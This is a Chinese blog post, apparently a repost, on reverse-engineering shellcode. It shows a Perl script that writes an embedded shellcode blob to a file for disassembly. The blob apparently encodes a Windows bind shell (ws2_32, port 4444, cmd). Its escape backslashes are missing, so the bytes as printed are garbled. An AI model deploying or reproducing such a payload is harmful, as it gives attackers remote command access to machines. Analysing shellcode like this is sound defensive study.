如何逆向分析shellcode?

最新推荐文章于 2024-05-11 12:22:12 发布
最新推荐文章于 2024-05-11 12:22:12 发布
阅读量2.1k 收藏
点赞数
分类专栏: asm
原文地址:如何逆向分析shellcode? 作者:小心
如何逆向分析shellcode?
经常可以看到一些精彩的shellcode,但又不知道它怎么来得,一堆16进制数字看的眼晕。这里有个方法:
首先用perl将这段shellcode写入一个二进制文件,然后利用反汇编工具进行反汇编,就可以看到shellcode对应汇编源码咯。呵呵
例如:
#!/usr/bin/perl
$shellcode=
        "xfcx6axebx4dxe8xf9xffxff xffx60x8bx6c".
        "x24x24x8bx45x3cx8bx7cx05 x78x01xefx8b".
        "x4fx18x8bx5fx20x01xebx49 x8bx34x8bx01".
        "xeex31xc0x99xacx84xc0x74 x07xc1xcax0d".
        "x01xc2xebxf4x3bx54x24x28 x75xe5x8bx5f".
        "x24x01xebx66x8bx0cx4bx8b x5fx1cx01xeb".
        "x03x2cx8bx89x6cx24x1cx61 xc3x31xdbx64".
        "x8bx43x30x8bx40x0cx8bx70 x1cxadx8bx40".
        "x08x5ex68x8ex4ex0execx50 xffxd6x66x53".
        "x66x68x33x32x68x77x73x32 x5fx54xffxd0".
        "x68xcbxedxfcx3bx50xffxd6 x5fx89xe5x66".
        "x81xedx08x02x55x6ax02xff xd0x68xd9x09".
        "xf5xadx57xffxd6x53x53x53 x53x53x43x53".
        "x43x53xffxd0x66x68x11x5c x66x53x89xe1".
        "x95x68xa4x1ax70xc7x57xff xd6x6ax10x51".
        "x55xffxd0x68xa4xadx2exe9 x57xffxd6x53".
        "x55xffxd0x68xe5x49x86x49 x57xffxd6x50".
        "x54x54x55xffxd0x93x68xe7 x79xc6x79x57".
        "xffxd6x55xffxd0x66x6ax64 x66x68x63x6d".
        "x89xe5x6ax50x59x29xccx89 xe7x6ax44x89".
        "xe2x31xc0xf3xaaxfex42x2d xfex42x2cx93".
        "x8dx7ax38xabxabxabx68x72 xfexb3x16xff".
        "x75x44xffxd6x5bx57x52x51 x51x51x6ax01".
        "x51x51x55x51xffxd0x68xad xd9x05xcex53".
        "xffxd6x6axffxffx37xffxd0 x8bx57xfcx83".
        "xc4x64xffxd6x52xffxd0x68 x7exd8xe2x73".
        "x53xffxd6xffxd0";
open(FILE,">shellcode.bin");
print FILE "$shellcode";
close(FILE);
然后利用反编译工具,比如nasm下的ndisasm,或者W32Dasm之类的反编译shellcode.bin,就可以看到对应汇编源码,从而学习人家的shellcode喔!呵呵
luoage_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows下shellcode检测工具
why99fun的专栏
04-16 918
scdbg http://sandsprite.com/blogs/index.php?uid=7&pid=152 setp1: 下载后直接运行gui_launcher.exe,这款工具也提供命令行解决方案,选上你所要使用的选项(setp2图),单击launch就可以分析了,本程序还提供自动寻找(setp3图)shellcode入口点操作,你可以尝试选择0到9的偏移地址,让shellcode
shellcode分析技巧
m0_60571990的博客
10-08 465
shellcode分析技巧
Shellcode分析工具PyAna
weixin_33885253的博客
07-06 121
Shellcode分析非常重要。然而,静态分析效果不佳,并且很容易失败。另外,静态分析工具通常不是免费的。而动态分析需要在适当的环境中,将shellcode加载到另一个进程中,通常是一个虚拟机。   PyAna原理 本文中我们将介绍一款新工具PyAna,该工具旨在使得分析shellcode更容易。PyAna使用Unicorn框架来模拟CPU,并创建一个...
[逆向工程] Shellcode 开发实验
最新发布
[热爱分享]希望大家都能花时间在学习自己喜欢的东西上
05-11 1047
逆向工程实验一:Shellcode开发实验
Shellcode调试分析工具
信息安全
02-28 980
文章目录前言代码使用方法 前言 在恶意软件分析的过程中,很多时候都会遇见shellcode,单独dump出来的shellcode在IDA中很难进行静态分析,但是由于Windows加载程序无法执行独立的shellcode,所以我们需要用工具来加载shellcode进行动态调试。 虽然已经有很好用的工具BlobRunner,但我仍然准备自己写一个去更好的学习理解 代码 #include <win...
【逆向】ShellCode分析基础
bailing1370的博客
07-25 658
1、shellcode经常与漏洞利用一起使用,或者被病毒等恶意代码用于进程注入。所以它们总是在一个程序中被植入运行。2、shellcode是一段与位置无关的代码。因为它在内存中的位置是随机不可控的,所以在编写shellcode时应该避开对内存地址进行硬编码。3、shellcode中包含数据和代码。所以在以位置无关的方式访问数据时,需要有一个基础地址(基址)加上或减去偏移的方式来访问。sh...
2017年恶意代码威胁回顾和快速分析实践.pdf
08-08
2017年供应链攻击,勒索事件和Office漏洞层出不穷,...4.shellcode分析技巧 loader shellcode to exe scdbg 5.finspy x86混淆 代码虚拟化 6.其它一些有助于分析的工具和脚本 7.代码混淆技术 8.NotPetya中一个有趣的发现
CDL_shellcode_源码
10-02
在这个上下文中,`CDL.java`可能是一个工具,用于将Java代码转换为JavaScript Shellcode,或者是一个分析Shellcode结构的工具。 Java Shellcode生成器的工作原理可能包括以下步骤: 1. 分析:解析Java代码或用户...
IDA Pro——逆向工程,二进制分析必备软件
02-12
是最棒的一个静态反编译软件,为众多0day世界的成员和ShellCode安全分析人士不可缺少的利器!IDA Pro是一款交互式的,可编程的,可扩展的,多处理器的,交叉Windows或Linux WinCE MacOS平台主机来分析程序, 被公认...
shellcode加载器用于加密shellcode的py小玩意
10-03
在安全领域,shellcode是逆向工程和漏洞利用研究的重要组成部分。"shellcode加载器"是一种工具,其目的是将shellcode注入到目标进程中,以便在运行时执行。本话题涉及的"shellcode加载器用于加密shellcode的py小玩意...
alpha2 shellcode解密的vbs脚本
09-06
在IT安全领域,Shellcode是一种特定的机器码,通常用于实现攻击者在目标系统上的恶意操作,例如远程代码执行。Shellcode通常是加密或...在分析和防御恶意软件时,理解这种解密过程对于逆向工程和安全研究人员至关重要。
逆向C++编程,反汇编技术
01-07
这是一个针对广大初学者的逆向C++编程,你懂得 为了能从二进制可执行文件中把类识别出来,我们必须先要理解这些类的实例——对象是怎样被创建的。因为这个创建过程在汇编级别上具体是怎样实现的会给我们在反汇编时如何识别这些类提供依据
code-collection:一个shell脚本工具,用于反编译多个jar文件并重新排列源代码-Source code collection
03-24
代码收集 ##如何使用 签出项目,打开终端并通过键入以下内容将目录更改为代码收集目录: cd /full-path/to/code-collection 运行extract-jars.sh来反编译存储在另一个目录中的所有jar和war文件 bash extract-jars.sh 例如,要反编译.m2 / repository / com中的所有Java库并将源代码保存在目录all-com-library-source-code中 反编译所有库文件后,我们可以使用工具collect.sh收集所有特定文件(例如.html , .js文件)。 例如,要从源代码目录收集所有.html文件并将其存储在all-html-files目录中: 注意: 如果将max deep of destination directory设置为-1 ,则目标目录的结构( all-html-files )将与a
《有趣的二进制:软件安全与逆向分析》读书笔记(三):利用软件的漏洞进行攻击
闵行小鱼塘
05-02 1401
本篇继续阅读学习《有趣的二进制:软件安全与逆向分析》,本章是利用软件的漏洞进行攻击,简单介绍了缓冲区溢出漏洞的原理和示例,然后给出了一些防御措施,最后介绍了对防御机制的绕过方法
逆向基础-shellCode
AppWhite_Star的博客
07-30 477
逆向基础-shellcode
滴水逆向----代码区添加shellcode
clayoa的博客
01-09 732
上次海哥讲到FileBuffer------>ImageBuffer,这次我们需要在代码区添加代码 我们这次要添加的代码功能:双击exe,先跳出MessageBox,然后软件正常使用 需要的知识点: 1.我们添加的代码不是c,不是汇编,而是二进制,因为exe都是二进制组成的,我们要知道一些汇编的硬编码,call的硬编码是E8,jmp的硬编码是E9 2.知道了call的硬编码,那么后面的地址是直接用编译器打开的地址吗?不是的,地址是经过转换得到的,公式:真正要跳转的地址=E8下一条指令的地址+X
shellcode反编译成c语言代码的两种方式
weixin_43090100的博客
10-04 5549
下述所用的工具包含:IDA pro,Dev C++ 以下介绍两种方法 开始操作之前,需要知道的几个小前提 一个可执行文件包含多个字段(field), text段是程序代码段,包含着要运行程序的指令。shellcode像你说的,转成汇编语言很容易,因为shellcode本质就是一段恶意的机器码——cpu指令 逆向工程(reverse engineering)常用到的分析工具大体有两个:olly...
shell方法
一个努力学习网安的小牛马
11-02 212
shell 开启回显 python -c “import pty;
linux下的C语言开发(开篇)
热门推荐
嵌入式-老费,一个分享专业嵌入式知识的blog
01-11 10万+
【 声明:版权所有,欢迎转载,请勿用于商业用途。  联系信箱:feixiaoxing @163.com】     在很多人的眼里,C语言和linux常常是分不开的。这其中的原因很多,其中最重要的一部分我认为是linux本身就是C语言的杰出作品。当然,linux操作系统本身对C语言的支持也是相当到位的。作为一个真正的程序员来说,如果没有在linux下面用C语言编写过完整的程序,那么只能说他对C
从零开始学IDA逆向(中)1
08-03
同时,还讲解了如何在启用DEP的情况下进行SEH(结构化异常处理)利用,通用shellcode的概念,堆栈中的不同类型的字符串,函数指针的利用,以及堆溢出的分析和防御机制。" 本文主要围绕逆向工程工具IDA和调试器Windbg...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值